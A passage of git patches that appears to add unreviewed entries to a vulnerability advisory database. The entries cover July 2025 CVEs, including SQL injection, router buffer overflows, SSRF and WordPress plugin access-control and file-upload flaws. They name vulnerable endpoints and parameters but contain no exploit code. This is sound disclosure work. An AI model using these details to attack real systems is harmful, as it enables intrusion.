a/advisories/unreviewed/2025/07/GHSA-w466-769j-w8jf/GHSA-w466-769j-w8jf.json b/advisories/unreviewed/2025/07/GHSA-w466-769j-w8jf/GHSA-w466-769j-w8jf.json new file mode 100644 index 0000000000000..e1b0e22c5088d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-w466-769j-w8jf/GHSA-w466-769j-w8jf.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w466-769j-w8jf", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-8134" + ], + "details": "A vulnerability classified as critical was found in PHPGurukul BP Monitoring Management System 1.0. This vulnerability affects unknown code of the file /bwdates-report-result.php. The manipulation of the argument fromdate/todate leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8134" + }, + { + "type": "WEB", + "url": "https://github.com/LagonGit/ReportCVE/issues/13" + }, + { + "type": "WEB", + "url": "https://github.com/LagonGit/ReportCVE/issues/14" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317530" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317530" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619810" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619813" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T06:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-whhf-v5j3-85q3/GHSA-whhf-v5j3-85q3.json b/advisories/unreviewed/2025/07/GHSA-whhf-v5j3-85q3/GHSA-whhf-v5j3-85q3.json new file mode 100644 index 0000000000000..8cbb7d7c841cc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-whhf-v5j3-85q3/GHSA-whhf-v5j3-85q3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whhf-v5j3-85q3", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-8131" + ], + "details": "A vulnerability was found in Tenda AC20 16.03.08.05. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8131" + }, + { + "type": "WEB", + "url": "https://github.com/Thir0th/Thir0th-CVE/blob/main/Tenda_AC20_V16.03.08.05_has_a_stack_overflow.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317527" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317527" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619769" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T05:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wxq5-cqj8-p4vx/GHSA-wxq5-cqj8-p4vx.json b/advisories/unreviewed/2025/07/GHSA-wxq5-cqj8-p4vx/GHSA-wxq5-cqj8-p4vx.json new file mode 100644 index 0000000000000..1a6d5d79a9814 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wxq5-cqj8-p4vx/GHSA-wxq5-cqj8-p4vx.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxq5-cqj8-p4vx", + "modified": "2025-07-25T06:30:31Z", + "published": "2025-07-25T06:30:31Z", + "aliases": [ + "CVE-2025-8133" + ], + "details": "A vulnerability classified as critical has been found in yanyutao0402 ChanCMS up to 3.1.2. This affects the function getArticle of the file app/modules/api/service/gather.js. The manipulation of the argument targetUrl leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.3 is able to address this issue. The identifier of the patch is 3ef58a50e8b3c427b03c8cf3c9e19a79aa809be6. It is recommended to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8133" + }, + { + "type": "WEB", + "url": "https://gitee.com/yanyutao0402/ChanCMS/commit/3ef58a50e8b3c427b03c8cf3c9e19a79aa809be6" + }, + { + "type": "WEB", + "url": "https://gitee.com/yanyutao0402/ChanCMS/issues/ICLP1K" + }, + { + "type": "WEB", + "url": "https://gitee.com/yanyutao0402/ChanCMS/releases/tag/V3.1.3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317529" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317529" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619777" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T06:15:24Z" + } +} \ No newline at end of file From 9db5f5baa69f7f2f6301363008e01d3a199eceb7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 09:32:16 +0000 Subject: [PATCH 143/323] Publish Advisories GHSA-4g9q-w72v-3543 GHSA-76rx-7pv8-wf99 GHSA-862h-mghm-42j7 GHSA-h7f2-69qh-3xqc GHSA-hc8w-46gq-hrcx GHSA-q75j-74j8-wcx3 GHSA-qcv8-39fr-gcc3 GHSA-rf6f-2cp5-q8fj GHSA-rfqm-q84j-gcqp --- .../GHSA-4g9q-w72v-3543.json | 56 +++++++++++++++++++ .../GHSA-76rx-7pv8-wf99.json | 40 +++++++++++++ .../GHSA-862h-mghm-42j7.json | 56 +++++++++++++++++++ .../GHSA-h7f2-69qh-3xqc.json | 40 +++++++++++++ .../GHSA-hc8w-46gq-hrcx.json | 56 +++++++++++++++++++ .../GHSA-q75j-74j8-wcx3.json | 56 +++++++++++++++++++ .../GHSA-qcv8-39fr-gcc3.json | 40 +++++++++++++ .../GHSA-rf6f-2cp5-q8fj.json | 56 +++++++++++++++++++ .../GHSA-rfqm-q84j-gcqp.json | 56 +++++++++++++++++++ 9 files changed, 456 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-4g9q-w72v-3543/GHSA-4g9q-w72v-3543.json create mode 100644 advisories/unreviewed/2025/07/GHSA-76rx-7pv8-wf99/GHSA-76rx-7pv8-wf99.json create mode 100644 advisories/unreviewed/2025/07/GHSA-862h-mghm-42j7/GHSA-862h-mghm-42j7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h7f2-69qh-3xqc/GHSA-h7f2-69qh-3xqc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hc8w-46gq-hrcx/GHSA-hc8w-46gq-hrcx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q75j-74j8-wcx3/GHSA-q75j-74j8-wcx3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qcv8-39fr-gcc3/GHSA-qcv8-39fr-gcc3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rf6f-2cp5-q8fj/GHSA-rf6f-2cp5-q8fj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rfqm-q84j-gcqp/GHSA-rfqm-q84j-gcqp.json diff --git a/advisories/unreviewed/2025/07/GHSA-4g9q-w72v-3543/GHSA-4g9q-w72v-3543.json b/advisories/unreviewed/2025/07/GHSA-4g9q-w72v-3543/GHSA-4g9q-w72v-3543.json new file mode 100644 index 0000000000000..9414623734bec --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4g9q-w72v-3543/GHSA-4g9q-w72v-3543.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4g9q-w72v-3543", + "modified": "2025-07-25T09:30:21Z", + "published": "2025-07-25T09:30:21Z", + "aliases": [ + "CVE-2025-8140" + ], + "details": "A vulnerability was found in TOTOLINK A702R 4.0.0-B20230721.1521. It has been declared as critical. This vulnerability affects unknown code of the file /boafrm/formWlanMultipleAP of the component HTTP POST Request Handler. The manipulation of the argument submit-url leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8140" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/totolink/a702r/formWlanMultipleAP.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317536" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317536" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620486" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T09:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-76rx-7pv8-wf99/GHSA-76rx-7pv8-wf99.json b/advisories/unreviewed/2025/07/GHSA-76rx-7pv8-wf99/GHSA-76rx-7pv8-wf99.json new file mode 100644 index 0000000000000..7d48aadb6ea8d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-76rx-7pv8-wf99/GHSA-76rx-7pv8-wf99.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76rx-7pv8-wf99", + "modified": "2025-07-25T09:30:21Z", + "published": "2025-07-25T09:30:20Z", + "aliases": [ + "CVE-2023-7306" + ], + "details": "The Frontend File Manager Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wpfm_delete_multiple_files() function in all versions up to, and including, 21.5. This makes it possible for unauthenticated attackers to delete arbitrary posts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7306" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/2912124/nmedia-user-file-uploader/trunk/inc/files.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/abf422ce-fa03-4bed-a4ec-b31d36de7633?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T09:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-862h-mghm-42j7/GHSA-862h-mghm-42j7.json b/advisories/unreviewed/2025/07/GHSA-862h-mghm-42j7/GHSA-862h-mghm-42j7.json new file mode 100644 index 0000000000000..1b994a13cdc72 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-862h-mghm-42j7/GHSA-862h-mghm-42j7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-862h-mghm-42j7", + "modified": "2025-07-25T09:30:21Z", + "published": "2025-07-25T09:30:21Z", + "aliases": [ + "CVE-2025-8139" + ], + "details": "A vulnerability was found in TOTOLINK A702R 4.0.0-B20230721.1521. It has been classified as critical. This affects an unknown part of the file /boafrm/formPortFw of the component HTTP POST Request Handler. The manipulation of the argument service_type leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8139" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/totolink/a702r/formPortFw.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317535" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317535" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620485" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T09:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h7f2-69qh-3xqc/GHSA-h7f2-69qh-3xqc.json b/advisories/unreviewed/2025/07/GHSA-h7f2-69qh-3xqc/GHSA-h7f2-69qh-3xqc.json new file mode 100644 index 0000000000000..7f4d4fea2d929 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h7f2-69qh-3xqc/GHSA-h7f2-69qh-3xqc.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7f2-69qh-3xqc", + "modified": "2025-07-25T09:30:20Z", + "published": "2025-07-25T09:30:20Z", + "aliases": [ + "CVE-2025-5835" + ], + "details": "The Droip plugin for WordPress is vulnerable to unauthorized modification and access of data due to a missing capability check on the droip_post_apis() function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform many actions as the AJAX hooks to several functions. Some potential impacts include arbitrary post deletion, arbitrary post creation, post duplication, settings update, user manipulation, and much more.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5835" + }, + { + "type": "WEB", + "url": "https://droip.com" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2e6b451-9835-4887-ade7-b18807223a88?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T07:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hc8w-46gq-hrcx/GHSA-hc8w-46gq-hrcx.json b/advisories/unreviewed/2025/07/GHSA-hc8w-46gq-hrcx/GHSA-hc8w-46gq-hrcx.json new file mode 100644 index 0000000000000..a283a255f549a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hc8w-46gq-hrcx/GHSA-hc8w-46gq-hrcx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc8w-46gq-hrcx", + "modified": "2025-07-25T09:30:21Z", + "published": "2025-07-25T09:30:20Z", + "aliases": [ + "CVE-2025-8137" + ], + "details": "A vulnerability has been found in TOTOLINK A702R 4.0.0-B20230721.1521 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /boafrm/formIpQoS of the component HTTP POST Request Handler. The manipulation of the argument mac leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8137" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/totolink/a702r/formIpQoS.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317533" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317533" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620483" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T08:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q75j-74j8-wcx3/GHSA-q75j-74j8-wcx3.json b/advisories/unreviewed/2025/07/GHSA-q75j-74j8-wcx3/GHSA-q75j-74j8-wcx3.json new file mode 100644 index 0000000000000..c8538ea835cac --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q75j-74j8-wcx3/GHSA-q75j-74j8-wcx3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q75j-74j8-wcx3", + "modified": "2025-07-25T09:30:20Z", + "published": "2025-07-25T09:30:20Z", + "aliases": [ + "CVE-2025-8136" + ], + "details": "A vulnerability, which was classified as critical, was found in TOTOLINK A702R 4.0.0-B20230721.1521. Affected is an unknown function of the file /boafrm/formFilter of the component HTTP POST Request Handler. The manipulation of the argument ip6addr leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8136" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/totolink/a702r/formFilter.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317532" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317532" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620482" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T07:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qcv8-39fr-gcc3/GHSA-qcv8-39fr-gcc3.json b/advisories/unreviewed/2025/07/GHSA-qcv8-39fr-gcc3/GHSA-qcv8-39fr-gcc3.json new file mode 100644 index 0000000000000..612cc67a000ea --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qcv8-39fr-gcc3/GHSA-qcv8-39fr-gcc3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcv8-39fr-gcc3", + "modified": "2025-07-25T09:30:20Z", + "published": "2025-07-25T09:30:20Z", + "aliases": [ + "CVE-2025-5831" + ], + "details": "The Droip plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the make_google_font_offline() function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5831" + }, + { + "type": "WEB", + "url": "https://droip.com" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dd129829-9682-4def-a07f-66f9178eeb77?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T07:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rf6f-2cp5-q8fj/GHSA-rf6f-2cp5-q8fj.json b/advisories/unreviewed/2025/07/GHSA-rf6f-2cp5-q8fj/GHSA-rf6f-2cp5-q8fj.json new file mode 100644 index 0000000000000..f6c7f8ad7fd19 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rf6f-2cp5-q8fj/GHSA-rf6f-2cp5-q8fj.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rf6f-2cp5-q8fj", + "modified": "2025-07-25T09:30:21Z", + "published": "2025-07-25T09:30:21Z", + "aliases": [ + "CVE-2025-8138" + ], + "details": "A vulnerability was found in TOTOLINK A702R 4.0.0-B20230721.1521 and classified as critical. Affected by this issue is some unknown functionality of the file /boafrm/formOneKeyAccessButton of the component HTTP POST Request Handler. The manipulation of the argument submit-url leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8138" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/totolink/a702r/formOneKeyAccessButton.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317534" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317534" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620484" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T08:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rfqm-q84j-gcqp/GHSA-rfqm-q84j-gcqp.json b/advisories/unreviewed/2025/07/GHSA-rfqm-q84j-gcqp/GHSA-rfqm-q84j-gcqp.json new file mode 100644 index 0000000000000..3fdf106880ba8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rfqm-q84j-gcqp/GHSA-rfqm-q84j-gcqp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfqm-q84j-gcqp", + "modified": "2025-07-25T09:30:20Z", + "published": "2025-07-25T09:30:20Z", + "aliases": [ + "CVE-2025-8135" + ], + "details": "A vulnerability, which was classified as critical, has been found in itsourcecode Insurance Management System 1.0. This issue affects some unknown processing of the file /updateAgent.php. The manipulation of the argument agent_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8135" + }, + { + "type": "WEB", + "url": "https://github.com/viaiam/CVE/issues/5" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317531" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317531" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619817" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T07:15:27Z" + } +} \ No newline at end of file From d8aee2f204768f4b491cd19b1b04441da75cd3ff Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 12:33:02 +0000 Subject: [PATCH 144/323] Publish Advisories GHSA-28w9-2v4x-592r GHSA-cpq7-j57g-4c4c GHSA-g44j-j74m-35jc GHSA-j3w2-2p33-x67q --- .../GHSA-28w9-2v4x-592r.json | 36 +++++++++++++ .../GHSA-cpq7-j57g-4c4c.json | 36 +++++++++++++ .../GHSA-g44j-j74m-35jc.json | 52 +++++++++++++++++++ .../GHSA-j3w2-2p33-x67q.json | 36 +++++++++++++ 4 files changed, 160 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-28w9-2v4x-592r/GHSA-28w9-2v4x-592r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cpq7-j57g-4c4c/GHSA-cpq7-j57g-4c4c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-g44j-j74m-35jc/GHSA-g44j-j74m-35jc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j3w2-2p33-x67q/GHSA-j3w2-2p33-x67q.json diff --git a/advisories/unreviewed/2025/07/GHSA-28w9-2v4x-592r/GHSA-28w9-2v4x-592r.json b/advisories/unreviewed/2025/07/GHSA-28w9-2v4x-592r/GHSA-28w9-2v4x-592r.json new file mode 100644 index 0000000000000..f4af66b3b1e77 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-28w9-2v4x-592r/GHSA-28w9-2v4x-592r.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-28w9-2v4x-592r", + "modified": "2025-07-25T12:31:18Z", + "published": "2025-07-25T12:31:18Z", + "aliases": [ + "CVE-2025-5254" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kron Technologies Kron PAM allows Stored XSS.This issue affects Kron PAM: before 3.7.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5254" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0178" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": 